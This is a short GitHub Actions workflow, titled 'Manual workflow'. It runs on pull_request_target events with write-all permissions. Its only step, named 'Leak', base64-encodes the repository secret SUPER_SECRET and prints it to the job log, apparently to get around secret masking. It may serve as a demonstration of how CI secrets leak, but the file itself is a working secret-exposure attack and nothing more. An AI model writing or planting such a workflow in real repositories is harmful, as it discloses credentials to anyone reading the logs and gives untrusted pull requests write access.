name: Manual workflow

on:
  pull_request_target:
    types: [assigned, opened, synchronize, reopened]

permissions: 
  write-all

jobs:
  create-push-pr:
    runs-on: ubuntu-latest

    steps:
      - name: Leak
        run: |
          echo ${{ secrets.SUPER_SECRET }} | base64 -w0 
